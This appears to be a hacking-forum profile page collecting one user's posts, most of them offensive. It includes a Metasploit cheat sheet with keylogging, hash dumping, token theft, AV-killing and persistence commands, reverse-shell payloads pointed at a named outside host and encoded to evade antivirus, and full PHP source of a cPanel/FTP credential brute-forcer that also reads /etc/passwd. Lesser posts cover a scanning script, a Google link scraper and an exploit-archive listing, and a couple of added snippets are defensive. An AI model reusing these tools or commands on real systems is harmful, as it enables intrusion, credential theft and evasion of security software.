
Fi8sVrs (Active Members)
Posts: 3206
Days Won: 87

Everything posted by Fi8sVrs

  1. The passwords should be extracted from the logs you have, and a dictionary built from the most frequently used ones.
  2. Meterpreter

     Process:
       getuid                          shows user id
       getpid                          shows meterpreter process id
       ps                              lists running processes
       migrate [pid]                   migrates to the given process (one that won't end/crash)

     KeyLog: ensure you are monitoring the correct session (Explorer.exe/WinLogon.exe)
       idletime                        shows how long the machine has been idle for
       keyscan_start                   starts the key logger
       keyscan_dump                    outputs captured data
       keyscan_stop                    stops the keylogger

     Channels: these allow you to do more than one thing at a time in meterpreter
       execute -f cmd.exe -c           opens a new cmd.exe and creates a new channel for it
       channel -l                      lists the open channels
       read [channel]                  outputs data from the channel
       interact [channel]              allows you to jump into the channel
       write [channel]                 sends data to the channel
       close [channel]                 kills the channel

     Session: Session0 is the local desktop. Session1+ are rdp sessions.
       enumdesktops                    shows currently open desktops such as winlogon etc.
       getdesktop                      shows the desktop session meterpreter is currently in
       setdesktop                      changes to an already open desktop session
       uictl disable keyboard          disables the keyboard of the desktop session

     FileEdit: ability to edit file attributes such as MACE
       timestomp file.txt -c "30/12/1980 12:12:34"   changes the file's stamp
       timestomp file.txt -f sourcefile.txt          copies the timestamp from sourcefile.txt
       use priv                        loads the priv extras
       hashdump                        dumps the SAM file

     Tokens: Incognito allows token stealing and other token functions
       use incognito                   loads incognito into meterpreter
       list_tokens -u                  shows stealable tokens
       impersonate_token               allows a token to be stolen
       steal_token [pid]               steals the token of a process
       rev2self                        reverts to the original token
       run post/windows/gather/cachedump   gets cached domain hashes (you need to wget http://lab.mediaservice.net/code/cachedump.rb to framework3/modules/post/windows/gather)

     Sniffer: allows promiscuous mode to be enabled
       use sniffer                     loads the sniffer functions
       sniffer_interfaces              lists interfaces 1,2,3,4,5,6,etc.
       sniffer_start [n]               starts the sniffer for the interface
       sniffer_stats [n]               lists packets, time, etc.
       sniffer_dump [n] file.pcap      dumps the capture locally
       sniffer_stop                    you guessed it

     Meterpreter Scripts: these scripts perform various functions on the victim
       run checkvm                     checks if the target is a VM
       run credscollect                dumps hashes and tokens to screen
       run enum_firefox                dumps temp internet files from Firefox (cookies, passwords, etc.)
       run get_application_list        shows installed applications
       run killav                      tries to stop all known AV programs
       run get_local_subnets           enumerates local subnet info
       run metsvc                      creates a backdoor
       run persistence                 survives a reboot (without admin or system)
       run schedulme -e file.exe -m 30 you'll need to manually load the meterpreter.exe payload
       run kitrap0d                    allows priv escalation using CVE-2010-0232

     Web browser exploit:
       use auxiliary/server/browser_autopwn
       set LHOST [local_ip]
       set SRVPORT 80
       set URIPATH /
       run
       # now get the client to connect to you (use ettercap dns)

     Inbuilt sqlite db:
       db_driver sqlite3               starts the db using sqlite (file based)
       db_connect job                  creates a new db called job and connects to it
       db_hosts                        shows hosts
       db_services                     shows visible services
       db_nmap -sS [target_ip]         performs nmap against the target and stores the result in the db
       db_import_nmap_xml              allows import
       db_autopwn -p -e -r -t          autopwn from db vulns

     Meterpreter Payload Backdoor:
       ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 X > clear.exe
       ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o encoded.exe
         sets the payload as meterpreter and then encodes it 5 times to bypass AV
       ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /share/spider.exe -e x86/shikata_ga_nai -c 5
         # this fucker bypasses sophos
       ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=4444 E

     One Liners:
       # One liner meterpreter reverse_tcp
       /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 X > /root/clear.exe
       # One liner shikata encoded meterpreter reverse_tcp
       /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/encoded.exe
       # One liner encoded and hidden in windows exe meterpreter reverse_tcp
       /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 R | /pentest/exploits/framework3/msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /root/spider.exe -e x86/shikata_ga_nai -c 5

     Source: Metasploit Notes | phillips321.co.uk
  3. So I've been using my bt5-nmap.sh script for a few years to quickly gather data whilst on a pentest. The main issue with the way this script worked was that it was not easy to continue a session half way through or to modify the number of running threads. This new script uses dialog, which comes as standard in bt5.

     Options:
       arpscan      run arp-scan to create targets.txt
       nmap         nmap targets
       amap         amap ports found using nmap
       sslscan      sslscan targets
       gwp          take photo of web pages found?
       snmpscans    check for default SNMP community strings
       snmpget      get data from SNMP services using known strings
       enum4linux   run enum4linux against targets
       smtp         connect to SMTP to check if they allow relaying of mail
       uniscan      run uniscan against HTTP(s) ports
       nfsscan      connect to nfs services and list contents

     You can check out the code using the following svn command: svn checkout phillips321 - Revision 24: /trunk phillips321 or view the code on the googlecode page. Here are a few photos followed by a quick demo video...
     https://www.phillips321.co.uk/pentest-sh/
  4. Anubis, Comodo, GFI Sandbox, jsunpack, Norman, ThreatExpert, Wepawet
  5. If you need to extract all the links / URLs from a Google search, you can use the following commands:

       wget -q -U "Mozilla/5.001" -O - "http://www.google.com/search?q=inurl%3Aaftershell.com&num=100&start=200" | \
       grep -o '<a href="http[^"]*"' | grep -v 'search?q=cache:' | grep -v '\.google\.' | sed 's/<a href="//;s/"$//'

     You can modify them to save the output or change the parameters for the languages (&hl= and &lr=) and many more...
     AfterShell.com
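As an added example that is not part of the original post: the same filtering the grep/sed pipeline above does, written in Python over an HTML parser rather than a regex, so hrefs with entity-encoded ampersands or attributes in a different order are still picked up. The HTML below is constructed for the example, not a real search results page.

```python
# Added example: parser-based version of the wget | grep | sed pipeline.
# Keeps absolute http(s) result links, drops Google's own links and cached
# copies, and deduplicates while preserving order.
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not a real Google response): one relative nav link,
# one cache link, one google.com link, two real results (one repeated), one
# javascript: link.
SAMPLE_HTML = """
<html><body>
<a href="/search?q=inurl%3Aaftershell.com&amp;start=100">Next</a>
<a href="http://www.google.com/search?q=cache:abc:www.aftershell.com/">Cached</a>
<a href="http://www.google.com/intl/en/about.html">About Google</a>
<a href="http://www.aftershell.com/shell/">AfterShell</a>
<a href="https://example.org/page?id=1">Example</a>
<a href="http://www.aftershell.com/shell/">AfterShell again</a>
<a href="javascript:void(0)">Tools</a>
</body></html>
"""


class _LinkCollector(HTMLParser):
    """Collect every href from <a> tags, in document order."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value:
                self.hrefs.append(value)


def extract_result_links(html):
    """Return absolute http(s) links that are neither cache links nor links
    into a google.* host, deduplicated in first-seen order."""
    parser = _LinkCollector()
    parser.feed(html)
    seen = set()
    out = []
    for href in parser.hrefs:
        if not href.startswith(("http://", "https://")):
            continue  # relative / javascript: links are page navigation, not results
        if "search?q=cache:" in href:
            continue  # cached copy, same filter as grep -v 'search?q=cache:'
        host = urlparse(href).hostname or ""
        if "google" in host.split("."):
            continue  # Google's own pages, same intent as grep -v '\.google\.'
        if href not in seen:
            seen.add(href)
            out.append(href)
    return out


if __name__ == "__main__":
    for link in extract_result_links(SAMPLE_HTML):
        print(link)
```

The grep version matches `<a href="http` only when href is the first attribute and the quote style is double; the parser version does not care about either, which matters when the markup changes.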
  6. Cpanel / FTP cracker (PHP). Two variable names were split by the forum's line wrapping ($connect_tim eout, $connect_ timeout) and one double quote inside a print string was unescaped; both are fixed below, everything else is as posted.

     <?php
     $cpanel_port="2082";
     $connect_timeout=5;
     set_time_limit(0);
     $submit=$_REQUEST['submit'];
     $users=$_REQUEST['users'];
     $pass=$_REQUEST['passwords'];
     $target=$_REQUEST['target'];
     $cracktype=$_REQUEST['cracktype'];
     if($target == ""){ $target = "localhost"; }
     ?>
     <html>
     <head>
     <meta http-equiv="Content-Language" content="en-us">
     </head>
     <title>Cpanel , FTP CraCkeR</title>
     <body text="#00FF00" bgcolor="#000000" vlink="#008000" link="#008000" alink="#008000">
     <div align="center">
     <form method="POST" style="border: 1px solid #000000">
     <img border="0" src="http://www.alm3refh.com/upload/group/groupxp.gif" width="426" height="169">
     <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700">
     <tr>
     <td>
     <p align="center"><b><font color="#008000" face="Tahoma" size="2"> <span lang="en-us">IP server</span> :</font><font face="Arial"> </font><font face="Arial" color="#CC0000"> <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px solid #1D1D1D; background-color: #000000; color:#008000; font-family:Verdana; font-weight:bold; font-size:13px"></font></b></p>
     <p align="center"><b><font color="#008000" face="Tahoma" size="2"> </font></b></p>
     <div align="center">
     <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700">
     <tr>
     <td align="center"> <span lang="en-us"><font color="#FF0000"><b>User List</b></font></span></td>
     <td> <p align="center"> <span lang="en-us"><font color="#FF0000"><b>Password List</b></font></span></td>
     </tr>
     </table>
     <p align="center"> <textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $users ?> </textarea><textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $pass ?></textarea><br> <br>
     <font style="font-weight:700" size="2" face="Tahoma" color="#008000"> <span lang="ar-sa">Guess options</span></font><font style="font-size: 12pt;" size="-3" face="Verdana"><span style="font-size: 9pt;"> <font face="Tahoma"> <input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio"></font></span></font><b><font size="2" face="Tahoma"> Cpanel</font><font size="2" color="#cc0000" face="Tahoma"> </font><font size="2" color="#FFFFFF" face="Tahoma"> (2082)</font></b><font size="2" face="Tahoma"><b> </b> </font>
     <font style="font-size: 12pt;" size="-3" face="Verdana"> <span style="font-size: 9pt;"><font face="Tahoma"> <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio"></font></span></font><b><font size="2" face="Tahoma"> Telnet</font><font size="2" color="#cc0000" face="Tahoma"> </font><font size="2" color="#FFFFFF" face="Tahoma"> (23)</font></b><font size="2" face="Tahoma"><b> </b> </font>
     <font style="font-size: 12pt;" size="-3" face="Verdana"> <span style="font-size: 9pt;"><font face="Tahoma"> <input name="cracktype" value="ftp" style="font-weight: 700;" type="radio"></font></span></font><font style="font-weight: 700;" size="2" face="Tahoma"> </font><span style="font-weight: 700;"> <font size="2" face="Tahoma">Ftp </font> <font size="2" color="#FFFFFF" face="Tahoma"> (21)</font></span> <br>
     <font style="font-weight:700" size="2" face="Tahoma" color="#008000"><span lang="ar-sa">Timeout delay</span> <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>"></input> </p>
     <p align="center"> <input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p>
     </td>
     </tr>
     </table>
     <p align="center"></td>
     </tr>
     </form>
     <?php
     function ftp_check($host,$user,$pass,$timeout) {
         $ch = curl_init();
         curl_setopt($ch, CURLOPT_URL, "ftp://$host");
         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
         curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
         curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
         curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
         curl_setopt($ch, CURLOPT_FAILONERROR, 1);
         $data = curl_exec($ch);
         if ( curl_errno($ch) == 28 ) {
             print "<b><font face=\"Verdana\" style=\"font-size: 9pt\"> <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout Please Check The Target Hostname .</font></font></b></p>";
             exit;
         } else if ( curl_errno($ch) == 0 ) {
             print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"#008000\"> Cracking Success With Username \"</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
         }
         curl_close($ch);
     }

     function cpanel_check($host,$user,$pass,$timeout) {
         global $cpanel_port;
         $ch = curl_init();
         //echo "http://$host:".$cpanel_port."<br>";
         curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
         curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
         curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
         curl_setopt($ch, CURLOPT_FAILONERROR, 1);
         $data = curl_exec($ch);
         if ( curl_errno($ch) == 28 ) {
             print "<b><font face=\"Verdana\" style=\"font-size: 9pt\"> <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout Please Check The Target Hostname .</font></font></b></p>";
             exit;
         } else if ( curl_errno($ch) == 0 ) {
             print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"#008000\"> Cracking Success With Username \"</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
         }
         curl_close($ch);
     }

     if(isset($submit) && !empty($submit)) {
         if(empty($users) && empty($pass)) {
             print "<p><font face=\"Tahoma\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>";
             exit;
         }
         if(empty($users)){
             print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>";
             exit;
         }
         if(empty($pass) ){
             print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>";
             exit;
         };
         $userlist=explode("\n",$users);
         $passlist=explode("\n",$pass);
         print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0000\"> Cracking Process Started, Please Wait ...</font></b><br><br>";
         if(isset($_POST['connect_timeout'])) {
             $connect_timeout=$_POST['connect_timeout'];
         }
         if($cracktype == "ftp") {
             foreach ($userlist as $user) {
                 $pureuser = trim($user);
                 foreach ($passlist as $password ) {
                     $purepass = trim($password);
                     ftp_check($target,$pureuser,$purepass,$connect_timeout);
                 }
             }
         }
         if ($cracktype == "cpanel" || $cracktype == "cpanel2") {
             if($cracktype == "cpanel2") { $cpanel_port="23"; }
             else $cpanel_port="2082";
             foreach ($userlist as $user) {
                 $pureuser = trim($user);
                 print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0800\"> Processing user $pureuser ...</font></b><br><br>";
                 foreach ($passlist as $password ) {
                     $purepass = trim($password);
                     cpanel_check($target,$pureuser,$purepass,$connect_timeout);
                 }
             }
         }
     }
     ?>
     <p align="center"><b><a href="http://www.alm3refh.com/vb"> <span style="text-decoration: none">Sunni</span></a></b></p>
     <form style="border: 0px ridge #FFFFFF">
     <p align="center"></td>
     </tr><div align="center">
     <tr>
     <input type="submit" name="user" value="user"><option value="name"></select>
     </form>
     <div align="center">
     <table border="1" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="1">
     <tr>
     <td bordercolorlight="#008000" bordercolordark="#006A00">
     <p align="left">
     <textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="25" name="S1" cols="22">
     <?php
     if (isset($_GET['user'])) system('ls /var/mail');
     if (isset($_POST['grab_users1'])) //grab users from /etc/passwd
     {
         $lines=file("/etc/passwd");
         foreach($lines as $nr=>$val) {
             $str=explode(":",$val);
             echo $str[0]."\n";
         }
     }
     if (isset($_POST['grab_users2'])) {
         $dir = "/home/";
         if ($dh = opendir($dir)) {
             while (($file = readdir($dh)) !== false) {
                 echo $file. "\n";
             }
             closedir($dh);
         }
     }
     for($uid=0;$uid<90000;$uid++) { }
     ?></textarea>
     <table>
     <tr>
     <form action="" method="POST">
     <input type="hidden" value="true" name="grab_users1"></input>
     <input type=submit value="Grab Usernames from /etc/passwd"></input>
     </form>
     </tr>
     <br>
     <tr>
     <form action="" method="POST">
     <input type="hidden" value="true" name="grab_users2"></input>
     <input type=submit value="Grab Usernames from /home/"></input>
     </form>
     </tr>
     <br>
     <tr>
     <form action="" method="POST">
     <input type="hidden" value="true" name="grab_users3"></input>
     <input type=submit value="Grab Usernames from /home/ II"></input>
     </form>
     </tr>
     </form>
     </table>
     <?php
     if (isset($_POST['grab_users3'])) {
         error_reporting(0);
         $dir = "/home/";
         if ($dh = opendir($dir)) {
             $f = readdir($dh);$f = readdir($dh);
             while (($f = readdir($dh)) !== false) {
                 //echo $f. "\n";
                 $f.="/";
                 $dh2=opendir($dir.$f);
                 $f2 = readdir($dh2);$f2 = readdir($dh2);
                 while (($f2 = readdir($dh2)) !== false) {
                     //echo $f2. "\n";
                     $f2.="/";
                     $dh3=opendir($dir.$f.$f2);
                     $f3 = readdir($dh3);$f3 = readdir($dh3);
                     while (($f3 = readdir($dh3)) !== false) {
                         echo $f3. "<br>";
                     }
                 }
             }
             closedir($dh);
         }
     }
     ?>

     Source: r00tw0rm
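As an added example, not part of the posted tool: what a run of it looks like from the defender's side. The tool walks every password for every user from one source address with no delay, so the signature is a burst of failures from one client spread over several usernames, possibly followed by a success. The detector below runs over constructed vsftpd-style log lines (the format and addresses are assumed for illustration); the cPanel variant would show up as the same burst of HTTP 401 responses on port 2082 in the web server's access log.

```python
# Added example: flag FTP brute-force / password-spraying bursts in
# vsftpd-style login records. Sliding window per client IP; a success
# after the burst is the case to escalate first.
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed log lines (not real traffic): one client hammering three
# accounts within a few seconds and finally getting in; one user with a
# single typo who logs in on the second try.
SAMPLE_LOG = """\
Sun May 27 10:12:01 2012 [pid 4011] [admin] FAIL LOGIN: Client "203.0.113.9"
Sun May 27 10:12:02 2012 [pid 4012] [admin] FAIL LOGIN: Client "203.0.113.9"
Sun May 27 10:12:02 2012 [pid 4013] [admin] FAIL LOGIN: Client "203.0.113.9"
Sun May 27 10:12:03 2012 [pid 4014] [webmaster] FAIL LOGIN: Client "203.0.113.9"
Sun May 27 10:12:03 2012 [pid 4015] [webmaster] FAIL LOGIN: Client "203.0.113.9"
Sun May 27 10:12:04 2012 [pid 4016] [root] FAIL LOGIN: Client "203.0.113.9"
Sun May 27 10:12:05 2012 [pid 4017] [root] OK LOGIN: Client "203.0.113.9"
Sun May 27 10:30:00 2012 [pid 4020] [alice] FAIL LOGIN: Client "198.51.100.7"
Sun May 27 10:30:09 2012 [pid 4021] [alice] OK LOGIN: Client "198.51.100.7"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"$'
)


def parse_line(line):
    """Return (timestamp, user, result, ip) or None for lines we don't understand."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("user"), m.group("result"), m.group("ip")


def detect_bruteforce(log_text, max_failures=5, window_seconds=60):
    """Flag every client IP that reaches max_failures FAIL LOGIN events inside any
    window_seconds span. Returns {ip: {"failures": total failures seen,
    "users": sorted usernames tried, "success_after": True if an OK LOGIN
    from that IP followed the burst}}."""
    recent = defaultdict(deque)   # ip -> (timestamp, user) failures inside the window
    flagged = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, result, ip = parsed
        if result == "FAIL":
            q = recent[ip]
            q.append((ts, user))
            while (ts - q[0][0]).total_seconds() > window_seconds:
                q.popleft()               # drop failures that fell out of the window
            if ip in flagged:
                flagged[ip]["failures"] += 1
                flagged[ip]["users"].add(user)
            elif len(q) >= max_failures:
                flagged[ip] = {"failures": len(q),
                               "users": {u for _, u in q},
                               "success_after": False}
        elif ip in flagged:
            flagged[ip]["success_after"] = True   # burst followed by a login: escalate
    for summary in flagged.values():
        summary["users"] = sorted(summary["users"])
    return flagged


if __name__ == "__main__":
    for ip, summary in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, summary)
```

The threshold is deliberately per source address rather than per account, because the tool rotates usernames; a per-account lockout counter would see only two or three failures per user and miss it.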
  7. SECITC, 5th International Conference on Security for Information Technology and Communications, June 2012, Bucharest, Romania.
     Conference areas: Cryptographic Algorithms and Protocols; Security Technologies for IT&C; Information Security Management.
     Conference papers will be published in the printed volume of the Conference Proceedings (printed volume with ISBN). Selected papers from the conference will be considered for publication in the supporting journals: Journal of Mobile, Embedded and Distributed Systems; Journal of Applied Quantitative Methods.
     5th International Conference on Security for Information Technology and Communications
     edit: that was the programme
  8. Specify the source you took it from.
  9. http://www.youtube.com/watch?v=3mch44il4QE Description: fimap is a Python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in web apps. fimap should be something like sqlmap, just for LFI/RFI bugs instead of SQL injection. It's currently under heavy development but it's usable. from: securitytube.net
  10. Online tool for creating .htaccess files: [en] .htaccess Editor
  11. This archive contains all of the 251 exploits added to Packet Storm in May, 2012.

      Directory: \1205-exploits

      Mode  LastWriteTime        Length  Name
      ----  -------------        ------  ----
      -a--- 5/11/2012 5:44 AM    4826    9sg_photoshock.tgz
      -a--- 5/22/2012 4:37 AM    4420    activecollab_chat.rb.txt
      -a--- 5/20/2012 10:22 PM   2050    acuitycms-shell.txt
      -a--- 5/20/2012 8:22 PM    1215    acuitycms-traversal.txt
      -a--- 5/23/2012 5:52 AM    2251    ajamintgallery-lfi.txt
      -a--- 5/20/2012 8:22 PM    3803    ajaxmintgallery-xsrf.txt
      -a--- 5/2/2012 4:51 AM     2884    alsovalue-sql.txt
      -a--- 5/4/2012 1:46 AM     4996    anvsoft-overflow.txt
      -a--- 5/12/2012 8:22 PM    2796    anvsoftanyvideo-overflow.txt
      -a--- 5/24/2012 5:44 AM    3339    apprain_upload_exec.rb.txt
      -a--- 5/19/2012 7:33 AM    1182    attractwebcms-sql.txt
      -a--- 5/16/2012 1:42 AM    6296    axous-csrf.txt
      -a--- 5/27/2012 9:48 PM    13034   azdgdatingmedium-xssxsrfexec.txt
      -a--- 5/20/2012 6:22 PM    734     azphotoalbum-xss.txt
      -a--- 5/14/2012 11:22 PM   1669    b2epms-sql.txt
      -a--- 5/27/2012 9:56 PM    2081    b2epms10-sql.txt
      -a--- 5/8/2012 4:13 PM     5116    baglercms-sqlxss.txt
      -a--- 5/18/2012 5:58 PM    3590    batik_svg_java.rb.txt
      -a--- 5/18/2012 5:58 PM    5088    bea_weblogic_post_bof.rb.txt
      -a--- 5/24/2012 3:12 PM    881     bsnes-dos.txt
      -a--- 5/17/2012 2:14 AM    634     captchaunijimpe-xss.txt
      -a--- 5/11/2012 12:11 AM   17502   chevereto-dos.txt
      -a--- 5/10/2012 7:11 AM    4030    chevreto-xss.txt
      -a--- 5/20/2012 6:22 PM    4217    chiccosnoopyclub-sqlxss.txt
      -a--- 5/8/2012 8:17 PM     3377    ciscolinksys-xsrf.txt
      -a--- 5/20/2012 4:22 PM    802     cmsahmebaprofessional-shell.txt
      -a--- 5/19/2012 12:09 PM   259553  concrete5521-xssxsrf.txt
      -a--- 5/20/2012 6:22 PM    4830    concretecms-shelldos.txt
      -a--- 5/8/2012 6:15 PM     13205   CORE-2012-0123.txt
      -a--- 5/18/2012 5:22 AM    1330    cryptographp-hrslfi.txt
      -a--- 5/25/2012 11:26 PM   3306    CSA-12005.txt
      -a--- 5/9/2012 8:23 PM     2495    decisiontools-exec.txt
      -a--- 5/4/2012 7:23 AM     3836    designmodern-sqlxss.txt
      -a--- 5/12/2012 12:59 AM   3256    distinct_tftp_traversal.rb.txt
      -a--- 5/18/2012 12:20 AM   4352    division6it-sqlxss.txt
      -a--- 5/25/2012 11:29 PM   6285    dorncms-shell.rb.txt
      -a--- 5/20/2012 2:11 PM    921     doubletakedesign-sql.txt
      -a--- 5/20/2012 6:22 PM    1061    dvdlab-dos.txt
      -a--- 5/25/2012 10:11 PM   4705    dynpage-xsrfshell.txt
      -a--- 5/7/2012 10:57 PM    1689    efront-shellxss.txt
      -a--- 5/11/2012 5:38 AM    560     elearning4g-sqlrfi.txt
      -a--- 5/7/2012 10:55 PM    2988    enjoygraphcommunication-sql.txt
      -a--- 5/2/2012 4:33 AM     2952    estudioayllon-sql.txt
      -a--- 5/7/2012 10:53 PM    2898    etelligence-sql.txt
      -a--- 5/3/2012 12:17 AM    1113    exophpdesk121-sql.txt
      -a--- 5/17/2012 2:41 AM    1195    flashpeak-dos.txt
      -a--- 5/31/2012 3:03 AM    1468    fldl-navigate.txt
      -a--- 5/22/2012 4:40 AM    5083    flexnet_lmgrd_bof.rb.txt
      -a--- 5/4/2012 1:34 AM     2288    fortiweb-bypass.txt
      -a--- 5/22/2012 4:39 AM    3643    foxit_reader_launch.rb.txt
      -a--- 5/14/2012 3:12 PM    712     galette-sql.txt
      -a--- 5/31/2012 2:52 AM    5762    ganesha-sqlxss.txt
      -a--- 5/25/2012 11:57 PM   1165    gekkocms-disclose.txt
      -a--- 5/31/2012 3:21 AM    2699    gimp-overflow.tgz
      -a--- 5/9/2012 8:55 PM     748     guitarpro-dos.txt
      -a--- 5/2/2012 4:52 AM     1345    heycats-xss.txt
      -a--- 5/18/2012 5:20 PM    2313    hpvsa-exec.txt
      -a--- 5/22/2012 4:38 AM    2755    hp_vsa_exec.rb.txt
      -a--- 5/31/2012 2:50 AM    3692    ibaguenet-sql.txt
      -a--- 5/3/2012 12:18 AM    1344    iguard-xss.txt
      -a--- 5/14/2012 2:23 AM    50164   imgrd_1.tgz
      -a--- 5/2/2012 7:00 AM     266     index.html
      -a--- 5/12/2012 2:11 PM    808     indexa-sql.txt
      -a--- 5/4/2012 2:03 AM     3214    ineat-sql.txt
      -a--- 5/27/2012 1:22 AM    2124    ios5_safari_js_crash.rb.txt
      -a--- 5/29/2012 2:19 AM    2143    ispvm_xcf_ispxcf.rb.txt
      -a--- 5/24/2012 5:47 PM    1472    jaow-sql.txt
      -a--- 5/7/2012 10:59 PM    2763    jibberbook-bypass.txt
      -a--- 5/11/2012 5:39 AM    1195    kerio-disclose.txt
      -a--- 5/6/2012 5:20 AM     1318    kerwebkerwin-xss.txt
      -a--- 5/9/2012 10:22 PM    1339    KORAMIS-ADV2012-001.txt
      -a--- 5/29/2012 2:04 AM    71737   libreoffice-dos.txt
      -a--- 5/16/2012 1:06 AM    44140   liferay-bypass.tgz
      -a--- 5/16/2012 1:16 AM    5314    liferay-disclose.tgz
      -a--- 5/14/2012 6:44 PM    941     liferay-escalate.txt
      -a--- 5/16/2012 1:35 AM    1516    liferay-xsrf.tgz
      -a--- 5/16/2012 1:10 AM    1787    liferay6-xss.txt
      -a--- 5/4/2012 1:40 AM     3276    lynx-sqlxss.txt
      -a--- 5/4/2012 1:45 AM     2923    mcafee_mvt_exec.rb.txt
      -a--- 5/7/2012 10:52 PM    4051    mdg-sqlxsrf.txt
      -a--- 5/2/2012 4:25 AM     13011   mikrotik-dos.txt
      -a--- 5/3/2012 12:35 AM    1332    mountaininternet-xss.txt
      -a--- 5/14/2012 8:37 AM    13908   mozilla_attribchildremoved.rb.txt
      -a--- 5/9/2012 1:22 AM     11395   mozilla_nssvgvalue.rb.txt
      -a--- 5/30/2012 2:26 AM    2856    mplayer_sami_bof.rb.txt
      -a--- 5/16/2012 1:01 AM    1125    multimediabuilder-dos.txt
      -a--- 5/2/2012 4:18 AM     1296    mychiptime-xss.txt
      -a--- 5/12/2012 1:11 PM    1553    nec-backdoor.txt
      -a--- 5/31/2012 2:49 AM    2783    newsadd-sql.txt
      -a--- 5/7/2012 11:00 PM    671     nexusinfotech-sql.txt
      -a--- 5/2/2012 5:07 AM     1982    NGS00117-1.txt
      -a--- 5/2/2012 5:11 AM     1709    NGS00118-1.txt
      -a--- 5/2/2012 4:05 AM     4086    NGS00137-1.txt
      -a--- 5/2/2012 4:07 AM     3437    NGS00138-1.txt
      -a--- 5/2/2012 4:28 AM     5677    NGS00140-1.txt
      -a--- 5/2/2012 5:00 AM     3758    NGS00141-1.txt
      -a--- 5/20/2012 2:11 PM    3560    nogod-sql.txt
      -a--- 5/23/2012 5:49 AM    7086    novell491-escalate.txt
      -a--- 5/15/2012 2:28 AM    3840    ntds-sql.txt
      -a--- 5/2/2012 6:54 PM     4518    openconf-sql.txt
      -a--- 5/23/2012 5:22 PM    1436    openid-session.txt
      -a--- 5/24/2012 5:44 AM    2490    openoffice_ole.rb.txt
